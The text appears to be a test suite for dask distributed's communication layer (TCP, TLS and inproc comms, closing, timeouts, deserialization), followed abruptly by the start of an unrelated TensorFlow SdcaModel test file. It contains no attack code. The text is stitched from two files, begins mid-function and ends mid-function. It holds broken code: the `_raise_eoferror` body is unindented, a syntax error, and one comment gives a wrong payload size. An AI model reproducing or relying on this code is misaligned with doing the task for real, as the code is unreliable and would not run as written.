        assert msg == {"op": "pong", "data": key}
        l.append(key)
        await comm.close()

    await client_communicate(key=1234)
    # Many clients at once
    N = 100
    futures = [client_communicate(key=i, delay=0.05) for i in range(N)]
    await asyncio.gather(*futures)
    assert set(l) == {1234} | set(range(N))
@pytest.mark.asyncio
async def test_comm_failure_threading():
    """
    When we fail to connect, make sure we don't make a lot
    of threads.
    We only assert for PY3, because the thread limit only is
    set for python 3. See github PR #2403 discussion for info.
    """

    async def sleep_for_60ms():
        # Sample the thread count while the failing connect runs concurrently.
        max_thread_count = 0
        for x in range(60):
            await asyncio.sleep(0.001)
            thread_count = threading.active_count()
            if thread_count > max_thread_count:
                max_thread_count = thread_count
        return max_thread_count

    original_thread_count = threading.active_count()

    # tcp.TCPConnector()
    sleep_future = sleep_for_60ms()
    with pytest.raises(IOError):
        await connect("tcp://localhost:28400", 0.052)
    max_thread_count = await sleep_future
    # 2 is the number set by BaseTCPConnector.executor (ThreadPoolExecutor)
    assert max_thread_count <= 2 + original_thread_count

    # tcp.TLSConnector()
    sleep_future = sleep_for_60ms()
    with pytest.raises(IOError):
        await connect(
            "tls://localhost:28400", 0.052, ssl_context=get_client_ssl_context()
        )
    max_thread_count = await sleep_future
    assert max_thread_count <= 2 + original_thread_count
async def check_inproc_specific(run_client):
    """
    Test concrete InProc API.
    """
    # *run_client* wraps the client coroutine (same thread or separate thread).
    listener_addr = inproc.global_manager.new_address()
    addr_head = listener_addr.rpartition("/")[0]

    client_addresses = set()

    N_MSGS = 3

    async def handle_comm(comm):
        # Server side: answer N_MSGS pings, then close.
        assert comm.peer_address.startswith("inproc://" + addr_head)
        client_addresses.add(comm.peer_address)
        for i in range(N_MSGS):
            msg = await comm.read()
            msg["op"] = "pong"
            await comm.write(msg)
        await comm.close()

    listener = await inproc.InProcListener(listener_addr, handle_comm)
    assert (
        listener.listen_address
        == listener.contact_address
        == "inproc://" + listener_addr
    )

    l = []

    async def client_communicate(key, delay=0):
        comm = await connect(listener.contact_address)
        assert comm.peer_address == "inproc://" + listener_addr
        for i in range(N_MSGS):
            await comm.write({"op": "ping", "data": key})
            if delay:
                await asyncio.sleep(delay)
            msg = await comm.read()
        assert msg == {"op": "pong", "data": key}
        l.append(key)
        # Reading after the server closed must raise.
        with pytest.raises(CommClosedError):
            await comm.read()
        await comm.close()

    client_communicate = partial(run_client, client_communicate)

    await client_communicate(key=1234)

    # Many clients at once
    N = 20
    futures = [client_communicate(key=i, delay=0.001) for i in range(N)]
    await asyncio.gather(*futures)
    assert set(l) == {1234} | set(range(N))
    # Every client got a distinct peer address, none equal to the listener's.
    assert len(client_addresses) == N + 1
    assert listener.contact_address not in client_addresses
def run_coro(func, *args, **kwargs):
    """Run the coroutine function directly on the current thread's loop."""
    return func(*args, **kwargs)
def run_coro_in_thread(func, *args, **kwargs):
    """Run the coroutine function on a fresh IOLoop in a new thread and
    return a Future resolved (or failed) on the calling thread's loop."""
    fut = Future()
    main_loop = ioloop.IOLoop.current()

    def run():
        thread_loop = ioloop.IOLoop()  # need fresh IO loop for run_sync()
        try:
            res = thread_loop.run_sync(partial(func, *args, **kwargs), timeout=10)
        except Exception:
            # Ship the failure back to the main loop's Future.
            main_loop.add_callback(fut.set_exc_info, sys.exc_info())
        else:
            main_loop.add_callback(fut.set_result, res)
        finally:
            thread_loop.close()

    t = threading.Thread(target=run)
    t.start()
    return fut
@pytest.mark.asyncio
async def test_inproc_specific_same_thread():
    """InProc comms: client coroutines run on the listener's own thread."""
    await check_inproc_specific(run_coro)
@pytest.mark.asyncio
async def test_inproc_specific_different_threads():
    """InProc comms: client coroutines run on separate threads/loops."""
    await check_inproc_specific(run_coro_in_thread)
#
# Test communications through the abstract API
#
async def check_client_server(
    addr,
    check_listen_addr=None,
    check_contact_addr=None,
    listen_args={},
    connect_args={},
):
    """
    Abstract client / server test.
    """
    # *check_listen_addr* / *check_contact_addr* are optional callbacks that
    # validate the bound and contact locations respectively.

    async def handle_comm(comm):
        # Server side: expect ping then foobar, answer the ping with pong.
        scheme, loc = parse_address(comm.peer_address)
        assert scheme == bound_scheme

        msg = await comm.read()
        assert msg["op"] == "ping"
        msg["op"] = "pong"
        await comm.write(msg)

        msg = await comm.read()
        assert msg["op"] == "foobar"

        await comm.close()

    # Arbitrary connection args should be ignored
    listen_args = listen_args or {"xxx": "bar"}
    connect_args = connect_args or {"xxx": "foo"}

    listener = await listen(addr, handle_comm, **listen_args)

    # Check listener properties
    bound_addr = listener.listen_address
    bound_scheme, bound_loc = parse_address(bound_addr)
    assert bound_scheme in backends
    assert bound_scheme == parse_address(addr)[0]

    if check_listen_addr is not None:
        check_listen_addr(bound_loc)

    contact_addr = listener.contact_address
    contact_scheme, contact_loc = parse_address(contact_addr)
    assert contact_scheme == bound_scheme

    if check_contact_addr is not None:
        check_contact_addr(contact_loc)
    else:
        assert contact_addr == bound_addr

    # Check client <-> server comms
    l = []

    async def client_communicate(key, delay=0):
        comm = await connect(listener.contact_address, **connect_args)
        assert comm.peer_address == listener.contact_address

        await comm.write({"op": "ping", "data": key})
        await comm.write({"op": "foobar"})
        if delay:
            await asyncio.sleep(delay)
        msg = await comm.read()
        assert msg == {"op": "pong", "data": key}
        l.append(key)
        await comm.close()

    await client_communicate(key=1234)

    # Many clients at once
    futures = [client_communicate(key=i, delay=0.05) for i in range(20)]
    await asyncio.gather(*futures)
    assert set(l) == {1234} | set(range(20))

    listener.stop()
@pytest.mark.asyncio
async def test_ucx_client_server():
    # Skip unless both the distributed UCX comm module and ucp are available.
    pytest.importorskip("distributed.comm.ucx")
    ucp = pytest.importorskip("ucp")

    addr = ucp.get_address()
    await check_client_server("ucx://" + addr)
def tcp_eq(expected_host, expected_port=None):
    """Return a checker asserting a TCP "host:port" location matches.

    When *expected_port* is omitted, any non-reserved port is accepted.
    """

    def checker(loc):
        host, port = parse_host_port(loc)
        assert host == expected_host
        if expected_port is None:
            # Any dynamically assigned (non-privileged) port is acceptable.
            assert 1023 < port < 65536
        else:
            assert port == expected_port

    return checker


tls_eq = tcp_eq
def inproc_check():
    """Return a checker validating an inproc "ip/pid/suffix" location.

    Bug fix: the checker closure was previously created but never
    returned, so callers received None and (since check_client_server
    skips a None checker) the inproc address check was silently skipped.
    """
    expected_ip = get_ip()
    expected_pid = os.getpid()

    def checker(loc):
        ip, pid, suffix = loc.split("/")
        assert ip == expected_ip
        assert int(pid) == expected_pid

    return checker
@pytest.mark.asyncio
async def test_default_client_server_ipv4():
    """Bare IPv4 addresses default to the TCP scheme."""
    cases = [
        ("127.0.0.1", tcp_eq("127.0.0.1")),
        ("127.0.0.1:3201", tcp_eq("127.0.0.1", 3201)),
        ("0.0.0.0", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4)),
        ("0.0.0.0:3202", tcp_eq("0.0.0.0", 3202), tcp_eq(EXTERNAL_IP4, 3202)),
        # IPv4 is preferred for the bound address
        ("", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4)),
        (":3203", tcp_eq("0.0.0.0", 3203), tcp_eq(EXTERNAL_IP4, 3203)),
    ]
    for case in cases:
        await check_client_server(*case)
@requires_ipv6
@pytest.mark.asyncio
async def test_default_client_server_ipv6():
    """Bare IPv6 addresses default to the TCP scheme."""
    cases = [
        ("[::1]", tcp_eq("::1")),
        ("[::1]:3211", tcp_eq("::1", 3211)),
        ("[::]", tcp_eq("::"), tcp_eq(EXTERNAL_IP6)),
        ("[::]:3212", tcp_eq("::", 3212), tcp_eq(EXTERNAL_IP6, 3212)),
    ]
    for case in cases:
        await check_client_server(*case)
@pytest.mark.asyncio
async def test_tcp_client_server_ipv4():
    """Explicit tcp:// client/server over IPv4 addresses."""
    cases = [
        ("tcp://127.0.0.1", tcp_eq("127.0.0.1")),
        ("tcp://127.0.0.1:3221", tcp_eq("127.0.0.1", 3221)),
        ("tcp://0.0.0.0", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4)),
        ("tcp://0.0.0.0:3222", tcp_eq("0.0.0.0", 3222), tcp_eq(EXTERNAL_IP4, 3222)),
        ("tcp://", tcp_eq("0.0.0.0"), tcp_eq(EXTERNAL_IP4)),
        ("tcp://:3223", tcp_eq("0.0.0.0", 3223), tcp_eq(EXTERNAL_IP4, 3223)),
    ]
    for case in cases:
        await check_client_server(*case)
@requires_ipv6
@pytest.mark.asyncio
async def test_tcp_client_server_ipv6():
    """Explicit tcp:// client/server over IPv6 addresses."""
    cases = [
        ("tcp://[::1]", tcp_eq("::1")),
        ("tcp://[::1]:3231", tcp_eq("::1", 3231)),
        ("tcp://[::]", tcp_eq("::"), tcp_eq(EXTERNAL_IP6)),
        ("tcp://[::]:3232", tcp_eq("::", 3232), tcp_eq(EXTERNAL_IP6, 3232)),
    ]
    for case in cases:
        await check_client_server(*case)
@pytest.mark.asyncio
async def test_tls_client_server_ipv4():
    """TLS client/server over IPv4, using the shared TLS context kwargs."""
    cases = [
        ("tls://127.0.0.1", tls_eq("127.0.0.1")),
        ("tls://127.0.0.1:3221", tls_eq("127.0.0.1", 3221)),
        ("tls://", tls_eq("0.0.0.0"), tls_eq(EXTERNAL_IP4)),
    ]
    for case in cases:
        await check_client_server(*case, **tls_kwargs)
@requires_ipv6
@pytest.mark.asyncio
async def test_tls_client_server_ipv6():
    # TLS over IPv6 loopback.
    await check_client_server("tls://[::1]", tls_eq("::1"), **tls_kwargs)
@pytest.mark.asyncio
async def test_inproc_client_server():
    """Inproc client/server with the default and an explicit fresh address."""
    for address in ("inproc://", inproc.new_address()):
        await check_client_server(address, inproc_check())
#
# TLS certificate handling
#
@pytest.mark.asyncio
async def test_tls_reject_certificate():
    """Connections whose certificate is not signed by the test CA are refused."""
    cli_ctx = get_client_ssl_context()
    serv_ctx = get_server_ssl_context()

    # These certs are not signed by our test CA
    bad_cert_key = ("tls-self-signed-cert.pem", "tls-self-signed-key.pem")
    bad_cli_ctx = get_client_ssl_context(*bad_cert_key)
    bad_serv_ctx = get_server_ssl_context(*bad_cert_key)

    async def handle_comm(comm):
        scheme, loc = parse_address(comm.peer_address)
        assert scheme == "tls"
        await comm.close()

    # Listener refuses a connector not signed by the CA
    listener = await listen("tls://", handle_comm, ssl_context=serv_ctx)

    with pytest.raises(EnvironmentError) as excinfo:
        comm = await connect(
            listener.contact_address, timeout=0.5, ssl_context=bad_cli_ctx
        )
        await comm.write({"x": "foo"})  # TODO: why is this necessary in Tornado 6 ?
    # NOTE: no assertion is made on the error text; it is platform-dependent
    # ("unknown ca" with OpenSSL, "An existing connection was forcibly closed"
    # on Windows). See
    # https://serverfault.com/questions/793260/what-does-tlsv1-alert-unknown-ca-mean
    # The previous code here was a no-op try/pass with an unreachable except
    # branch and has been removed.

    # Sanity check
    comm = await connect(listener.contact_address, timeout=2, ssl_context=cli_ctx)
    await comm.close()

    # Connector refuses a listener not signed by the CA
    listener = await listen("tls://", handle_comm, ssl_context=bad_serv_ctx)

    with pytest.raises(EnvironmentError) as excinfo:
        await connect(listener.contact_address, timeout=2, ssl_context=cli_ctx)
    assert "certificate verify failed" in str(excinfo.value.__cause__)
#
# Test communication closing
#
async def check_comm_closed_implicit(addr, delay=None, listen_args=None, connect_args=None):
    """Peer-initiated close must surface as CommClosedError on read and write.

    Defaults for ``listen_args`` / ``connect_args`` are None rather than
    mutable ``{}`` (shared-dict default pitfall); coalesced below.
    """
    listen_args = listen_args or {}
    connect_args = connect_args or {}

    async def handle_comm(comm):
        # Close immediately; the client then observes a dead comm.
        await comm.close()

    listener = await listen(addr, handle_comm, **listen_args)

    comm = await connect(listener.contact_address, **connect_args)
    with pytest.raises(CommClosedError):
        await comm.write({})
        await comm.read()

    comm = await connect(listener.contact_address, **connect_args)
    with pytest.raises(CommClosedError):
        await comm.read()
@pytest.mark.asyncio
async def test_tcp_comm_closed_implicit():
    # TCP comms must raise CommClosedError after the peer closes.
    await check_comm_closed_implicit("tcp://127.0.0.1")
@pytest.mark.asyncio
async def test_tls_comm_closed_implicit():
    # Same as the TCP case, over TLS.
    await check_comm_closed_implicit("tls://127.0.0.1", **tls_kwargs)
@pytest.mark.asyncio
async def test_inproc_comm_closed_implicit():
    # Same as the TCP case, over an in-process comm.
    await check_comm_closed_implicit(inproc.new_address())
async def check_comm_closed_explicit(addr, listen_args=None, connect_args=None):
    """Explicit close must abort in-flight and future reads/writes on both ends.

    Defaults for ``listen_args`` / ``connect_args`` are None rather than
    mutable ``{}`` (shared-dict default pitfall); coalesced below.
    """
    listen_args = listen_args or {}
    connect_args = connect_args or {}
    a, b = await get_comm_pair(addr, listen_args=listen_args, connect_args=connect_args)
    a_read = a.read()
    b_read = b.read()
    await a.close()
    # In-flight reads should abort with CommClosedError
    with pytest.raises(CommClosedError):
        await a_read
    with pytest.raises(CommClosedError):
        await b_read
    # New reads as well
    with pytest.raises(CommClosedError):
        await a.read()
    with pytest.raises(CommClosedError):
        await b.read()
    # And writes
    with pytest.raises(CommClosedError):
        await a.write({})
    with pytest.raises(CommClosedError):
        await b.write({})
    await b.close()
@pytest.mark.asyncio
async def test_tcp_comm_closed_explicit():
    # Explicit close over TCP aborts pending and future I/O.
    await check_comm_closed_explicit("tcp://127.0.0.1")
@pytest.mark.asyncio
async def test_tls_comm_closed_explicit():
    # Explicit close over TLS aborts pending and future I/O.
    await check_comm_closed_explicit("tls://127.0.0.1", **tls_kwargs)
@pytest.mark.asyncio
async def test_inproc_comm_closed_explicit():
    # Explicit close over an in-process comm aborts pending and future I/O.
    await check_comm_closed_explicit(inproc.new_address())
@pytest.mark.asyncio
async def test_inproc_comm_closed_explicit_2():
    """Closing one side of an inproc comm is observed by both peers."""
    listener_errors = []

    async def handle_comm(comm):
        # Wait
        try:
            await comm.read()
        except CommClosedError:
            assert comm.closed()
            listener_errors.append(True)
        else:
            await comm.close()

    listener = await listen("inproc://", handle_comm)

    comm = await connect(listener.contact_address)
    await comm.close()
    assert comm.closed()
    # The handler should observe the close as CommClosedError within ~1s.
    start = time()
    while len(listener_errors) < 1:
        assert time() < start + 1
        await asyncio.sleep(0.01)
    assert len(listener_errors) == 1

    with pytest.raises(CommClosedError):
        await comm.read()
    with pytest.raises(CommClosedError):
        await comm.write("foo")

    comm = await connect(listener.contact_address)
    await comm.write("foo")
    with pytest.raises(CommClosedError):
        await comm.read()
    with pytest.raises(CommClosedError):
        await comm.write("foo")
    assert comm.closed()

    comm = await connect(listener.contact_address)
    await comm.write("foo")
    # Wait for the handler-side close to propagate back to the client.
    start = time()
    while not comm.closed():
        await asyncio.sleep(0.01)
    assert time() < start + 2

    # Closing an already-closed comm must be a harmless no-op.
    await comm.close()
    await comm.close()
@pytest.mark.asyncio
async def test_comm_closed_on_buffer_error():
    # Internal errors from comm.stream.write, such as
    # BufferError should lead to the stream being closed
    # and not re-used. See GitHub #4133
    reader, writer = await get_tcp_comm_pair()

    def _write(data):
        raise BufferError

    # Monkeypatch the underlying stream write to always fail.
    writer.stream.write = _write
    with pytest.raises(BufferError):
        await writer.write("x")
    # The failed stream must be dropped, not recycled.
    assert writer.stream is None

    await reader.close()
    await writer.close()
#
# Various stress tests
#
async def echo(comm):
    """Read a single message from *comm* and write it straight back."""
    await comm.write(await comm.read())
@pytest.mark.asyncio
async def test_retry_connect(monkeypatch):
    """connect() must retry when the underlying connector fails transiently."""

    async def echo(comm):
        message = await comm.read()
        await comm.write(message)

    class UnreliableConnector(TCPConnector):
        def __init__(self):
            # Fail the first few attempts, then delegate to the real connector.
            self.num_failures = 2
            self.failures = 0
            super().__init__()

        async def connect(self, address, deserialize=True, **connection_args):
            if self.failures > self.num_failures:
                return await super().connect(address, deserialize, **connection_args)
            else:
                self.failures += 1
                raise OSError()

    class UnreliableBackend(TCPBackend):
        _connector_class = UnreliableConnector

    # Swap the registered "tcp" backend for the flaky one for this test only.
    monkeypatch.setitem(backends, "tcp", UnreliableBackend())

    listener = await listen("tcp://127.0.0.1:1234", echo)
    try:
        comm = await connect(listener.contact_address)
        await comm.write(b"test")
        msg = await comm.read()
        assert msg == b"test"
    finally:
        listener.stop()
@pytest.mark.asyncio
async def test_handshake_slow_comm(monkeypatch):
    """A comm that is slow inside read()/write() must trip the handshake timeout."""

    class SlowComm(TCP):
        def __init__(self, *args, delay_in_comm=0.5, **kwargs):
            super().__init__(*args, **kwargs)
            self.delay_in_comm = delay_in_comm

        async def read(self, *args, **kwargs):
            await asyncio.sleep(self.delay_in_comm)
            return await super().read(*args, **kwargs)

        async def write(self, *args, **kwargs):
            await asyncio.sleep(self.delay_in_comm)
            # Zero-argument super() instead of super(type(self), self):
            # the latter recurses infinitely if SlowComm is ever subclassed.
            return await super().write(*args, **kwargs)

    class SlowConnector(TCPConnector):
        comm_class = SlowComm

    class SlowBackend(TCPBackend):
        _connector_class = SlowConnector

    monkeypatch.setitem(backends, "tcp", SlowBackend())
    listener = await listen("tcp://127.0.0.1:1234", echo)
    try:
        # The slow comm still works with the default (generous) timeout...
        comm = await connect(listener.contact_address)
        await comm.write(b"test")
        msg = await comm.read()
        assert msg == b"test"

        import dask

        # ...but a 100ms connect timeout must fail during the handshake.
        with dask.config.set({"distributed.comm.timeouts.connect": "100ms"}):
            with pytest.raises(
                IOError, match="Timed out during handshake while connecting to"
            ):
                await connect(listener.contact_address)
    finally:
        listener.stop()
async def check_connect_timeout(addr):
    """connect() to an unresponsive address must honour its timeout."""
    start = time()
    with pytest.raises(IOError):
        await connect(addr, timeout=0.15)
    elapsed = time() - start
    # Roughly the requested 0.15s: neither instant nor hanging.
    assert 0.1 <= elapsed <= 1
@pytest.mark.asyncio
async def test_tcp_connect_timeout():
    # Port 44444 is assumed unused; the connect attempt should time out.
    await check_connect_timeout("tcp://127.0.0.1:44444")
@pytest.mark.asyncio
async def test_inproc_connect_timeout():
    # A fresh inproc address has no listener, so connect must time out.
    await check_connect_timeout(inproc.new_address())
async def check_many_listeners(addr):
    """Many listeners can coexist on *addr*, each with a unique address."""

    async def handle_comm(comm):
        pass

    N = 100
    listeners = [await listen(addr, handle_comm) for _ in range(N)]

    # Every listener must have been assigned distinct addresses.
    assert len({l.listen_address for l in listeners}) == N
    assert len({l.contact_address for l in listeners}) == N

    for listener in listeners:
        listener.stop()
@pytest.mark.asyncio
async def test_tcp_many_listeners():
    """Many TCP listeners on loopback, wildcard and default addresses."""
    for addr in ("tcp://127.0.0.1", "tcp://0.0.0.0", "tcp://"):
        await check_many_listeners(addr)
@pytest.mark.asyncio
async def test_inproc_many_listeners():
    # Many concurrent in-process listeners, each with a unique address.
    await check_many_listeners("inproc://")
#
# Test deserialization
#
async def check_listener_deserialize(addr, deserialize, in_value, check_out):
    """Send *in_value* to a listener created with the given deserialize flag,
    then validate what the listener received via *check_out*."""
    q = asyncio.Queue()

    async def handle_comm(comm):
        msg = await comm.read()
        q.put_nowait(msg)
        await comm.close()

    async with listen(addr, handle_comm, deserialize=deserialize) as listener:
        comm = await connect(listener.contact_address)

        await comm.write(in_value)
        out_value = await q.get()
        check_out(out_value)
        await comm.close()
async def check_connector_deserialize(addr, deserialize, in_value, check_out):
    """Receive *in_value* through a connector created with the given
    deserialize flag, then validate the received value via *check_out*."""
    done = asyncio.Event()

    async def handle_comm(comm):
        await comm.write(in_value)
        # Keep the server-side comm open until the client has read.
        await done.wait()
        await comm.close()

    async with listen(addr, handle_comm) as listener:
        comm = await connect(listener.contact_address, deserialize=deserialize)

        out_value = await comm.read()
        done.set()
        await comm.close()
    check_out(out_value)
async def check_deserialize(addr):
    """
    Check the "deserialize" flag on connect() and listen().

    Runs two passes: small Serialize/Serialized payloads, then large
    (8 MB) incompressible bytestrings, each checked with the flag both
    off and on, in both listener and connector directions.
    """
    # Test with Serialize and Serialized objects
    msg = {
        "op": "update",
        "x": b"abc",
        "to_ser": [to_serialize(123)],
        "ser": Serialized(*serialize(456)),
    }
    msg_orig = msg.copy()

    def check_out_false(out_value):
        # Check output with deserialize=False
        out_value = out_value.copy()  # in case transport passed the object as-is
        to_ser = out_value.pop("to_ser")
        ser = out_value.pop("ser")
        expected_msg = msg_orig.copy()
        del expected_msg["ser"]
        del expected_msg["to_ser"]
        assert out_value == expected_msg

        assert isinstance(ser, Serialized)
        assert deserialize(ser.header, ser.frames) == 456

        assert isinstance(to_ser, (tuple, list)) and len(to_ser) == 1
        (to_ser,) = to_ser
        # The to_serialize() value could have been actually serialized
        # or not (it's a transport-specific optimization)
        if isinstance(to_ser, Serialized):
            assert deserialize(to_ser.header, to_ser.frames) == 123
        else:
            assert to_ser == to_serialize(123)

    def check_out_true(out_value):
        # Check output with deserialize=True
        expected_msg = msg.copy()
        expected_msg["ser"] = 456
        expected_msg["to_ser"] = [123]
        # Notice, we allow "to_ser" to be a tuple or a list
        assert list(out_value.pop("to_ser")) == expected_msg.pop("to_ser")
        assert out_value == expected_msg

    await check_listener_deserialize(addr, False, msg, check_out_false)
    await check_connector_deserialize(addr, False, msg, check_out_false)

    await check_listener_deserialize(addr, True, msg, check_out_true)
    await check_connector_deserialize(addr, True, msg, check_out_true)

    # Test with long bytestrings, large enough to be transferred
    # as a separate payload
    # TODO: currently bytestrings are not transferred as a separate payload
    _uncompressible = os.urandom(1024 ** 2) * 4  # end size: 8 MB

    msg = {
        "op": "update",
        "x": _uncompressible,
        "to_ser": (to_serialize(_uncompressible),),
        "ser": Serialized(*serialize(_uncompressible)),
    }
    msg_orig = msg.copy()

    def check_out(deserialize_flag, out_value):
        # Check output with deserialize=False
        assert sorted(out_value) == sorted(msg_orig)
        out_value = out_value.copy()  # in case transport passed the object as-is
        to_ser = out_value.pop("to_ser")
        ser = out_value.pop("ser")
        expected_msg = msg_orig.copy()
        del expected_msg["ser"]
        del expected_msg["to_ser"]
        assert out_value == expected_msg

        if deserialize_flag:
            assert isinstance(ser, (bytes, bytearray))
            assert bytes(ser) == _uncompressible
        else:
            assert isinstance(ser, Serialized)
            assert deserialize(ser.header, ser.frames) == _uncompressible
            assert isinstance(to_ser, tuple) and len(to_ser) == 1
            (to_ser,) = to_ser
            # The to_serialize() value could have been actually serialized
            # or not (it's a transport-specific optimization)
            if isinstance(to_ser, Serialized):
                assert deserialize(to_ser.header, to_ser.frames) == _uncompressible
            else:
                assert to_ser == to_serialize(_uncompressible)

    await check_listener_deserialize(addr, False, msg, partial(check_out, False))
    await check_connector_deserialize(addr, False, msg, partial(check_out, False))

    await check_listener_deserialize(addr, True, msg, partial(check_out, True))
    await check_connector_deserialize(addr, True, msg, partial(check_out, True))
@pytest.mark.flaky(reruns=10, reruns_delay=5, condition=WINDOWS)
@pytest.mark.asyncio
async def test_tcp_deserialize():
    # Exercise the deserialize flag over TCP (flaky on Windows, hence reruns).
    await check_deserialize("tcp://")
@pytest.mark.asyncio
async def test_inproc_deserialize():
    # Exercise the deserialize flag over the in-process transport.
    await check_deserialize("inproc://")
async def check_deserialize_roundtrip(addr):
    """
    Sanity check round-tripping with "deserialize" on and off.
    """
    # Test with long bytestrings, large enough to be transferred
    # as a separate payload
    _uncompressible = os.urandom(1024 ** 2) * 4  # end size: 4 MB

    msg = {
        "op": "update",
        "x": _uncompressible,
        "to_ser": [to_serialize(_uncompressible)],
        "ser": Serialized(*serialize(_uncompressible)),
    }

    for should_deserialize in (True, False):
        a, b = await get_comm_pair(addr, deserialize=should_deserialize)
        await a.write(msg)
        got = await b.read()
        await b.write(got)
        got = await a.read()

        assert sorted(got) == sorted(msg)
        for k in ("op", "x"):
            assert got[k] == msg[k]
        # With deserialization on, wrapped payloads come back as raw bytes;
        # with it off, the wrapper objects survive the round-trip.
        if should_deserialize:
            assert isinstance(got["to_ser"][0], (bytes, bytearray))
            assert isinstance(got["ser"], (bytes, bytearray))
        else:
            assert isinstance(got["to_ser"][0], (to_serialize, Serialized))
            assert isinstance(got["ser"], Serialized)
@pytest.mark.asyncio
async def test_inproc_deserialize_roundtrip():
    # Round-trip serialization sanity check over the in-process transport.
    await check_deserialize_roundtrip("inproc://")
@pytest.mark.asyncio
async def test_tcp_deserialize_roundtrip():
    # Round-trip serialization sanity check over TCP.
    await check_deserialize_roundtrip("tcp://")
def _raise_eoferror():
raise EOFError
class _EOFRaising:
    """Object whose deserialization raises EOFError (via __reduce__)."""

    def __reduce__(self):
        # Unpickling will call _raise_eoferror(), which raises EOFError.
        return _raise_eoferror, ()
async def check_deserialize_eoferror(addr):
    """
    EOFError when deserializing should close the comm.
    """

    async def handle_comm(comm):
        await comm.write({"data": to_serialize(_EOFRaising())})
        with pytest.raises(CommClosedError):
            await comm.read()

    async with listen(addr, handle_comm) as listener:
        # NOTE(review): the module-level ``deserialize`` *function* is passed
        # as the flag here; being truthy it enables deserialization — confirm
        # this is intentional rather than ``deserialize=True``.
        comm = await connect(listener.contact_address, deserialize=deserialize)
        with pytest.raises(CommClosedError):
            await comm.read()
@pytest.mark.asyncio
async def test_tcp_deserialize_eoferror():
    # A deserialization EOFError over TCP must close the comm.
    await check_deserialize_eoferror("tcp://")
#
# Test various properties
#
async def check_repr(a, b):
    """A comm's repr must mention "closed" exactly once it has been closed."""
    for comm in (a, b):
        assert "closed" not in repr(comm)
    for comm in (a, b):
        await comm.close()
        assert "closed" in repr(comm)
@pytest.mark.asyncio
async def test_tcp_repr():
    a, b = await get_tcp_comm_pair()
    # Each comm's repr should mention the other endpoint's local address.
    assert a.local_address in repr(b)
    assert b.local_address in repr(a)
    await check_repr(a, b)
@pytest.mark.asyncio
async def test_tls_repr():
    a, b = await get_tls_comm_pair()
    # Each comm's repr should mention the other endpoint's local address.
    assert a.local_address in repr(b)
    assert b.local_address in repr(a)
    await check_repr(a, b)
@pytest.mark.asyncio
async def test_inproc_repr():
    a, b = await get_inproc_comm_pair()
    # Each comm's repr should mention the other endpoint's local address.
    assert a.local_address in repr(b)
    assert b.local_address in repr(a)
    await check_repr(a, b)
async def check_addresses(a, b):
    """The two endpoints of a comm pair mirror each other's addresses."""
    assert a.peer_address == b.local_address
    assert b.peer_address == a.local_address
    a.abort()
    b.abort()
@pytest.mark.asyncio
async def test_tcp_adresses():  # NOTE: "adresses" typo kept; pytest discovers by name
    a, b = await get_tcp_comm_pair()
    await check_addresses(a, b)
@pytest.mark.asyncio
async def test_tls_adresses():  # NOTE: "adresses" typo kept; pytest discovers by name
    a, b = await get_tls_comm_pair()
    await check_addresses(a, b)
@pytest.mark.asyncio
async def test_inproc_adresses():  # NOTE: "adresses" typo kept; pytest discovers by name
    a, b = await get_inproc_comm_pair()
    await check_addresses(a, b)
def test_register_backend_entrypoint():
    """A comm backend registered via entry points is discoverable by scheme."""
    # Code adapted from pandas backend entry point testing
    # https://github.com/pandas-dev/pandas/blob/2470690b9f0826a8feb426927694fa3500c3e8d2/pandas/tests/plotting/test_backend.py#L50-L76
    dist = pkg_resources.get_distribution("distributed")
    if dist.module_path not in distributed.__file__:
        # We are running from a non-installed distributed, and this test is invalid
        pytest.skip("Testing a non-installed distributed")

    # Fake backend module exposing a dummy UDPBackend factory.
    mod = types.ModuleType("dask_udp")
    mod.UDPBackend = lambda: 1
    sys.modules[mod.__name__] = mod

    entry_point_name = "distributed.comm.backends"
    backends_entry_map = pkg_resources.get_entry_map("distributed")
    if entry_point_name not in backends_entry_map:
        backends_entry_map[entry_point_name] = dict()

    backends_entry_map[entry_point_name]["udp"] = pkg_resources.EntryPoint(
        "udp", mod.__name__, attrs=["UDPBackend"], dist=dist
    )

    # The require is disabled here since particularly unit tests may install
    # dirty or dev versions which are conflicting with backend entrypoints if
    # they are demanding for exact, stable versions. This should not fail the
    # test
    result = get_backend("udp", require=False)
    assert result == 1
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sdca_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import googletest
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SDCAModel
from tensorflow_estimator.python.estimator.canned.linear_optimizer.python.utils.sdca_ops import _SparseFeatureColumn
# Cap on the number of minimize() steps run by each test.
_MAX_ITERATIONS = 100
# Hash-table shard counts exercised per test (None = unsharded).
_SHARD_NUMBERS = [None, 1, 3]
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
  """Build a tf.Example with a float target plus sparse feature columns.

  For each key in *feature_dict*, emits '<key>_indices' (int64) and
  '<key>_values' (float, all equal to *value*) feature lists.
  """
  example = example_pb2.Example()
  feature_map = example.features.feature
  feature_map['target'].float_list.value.append(target)
  for key, indices in feature_dict.items():
    feature_map[key + '_indices'].int64_list.value.extend(indices)
    feature_map[key + '_values'].float_list.value.extend([value] * len(indices))
  return example
def make_example_dict(example_protos, example_weights):
  """Parse example protos into the examples dict consumed by _SDCAModel."""

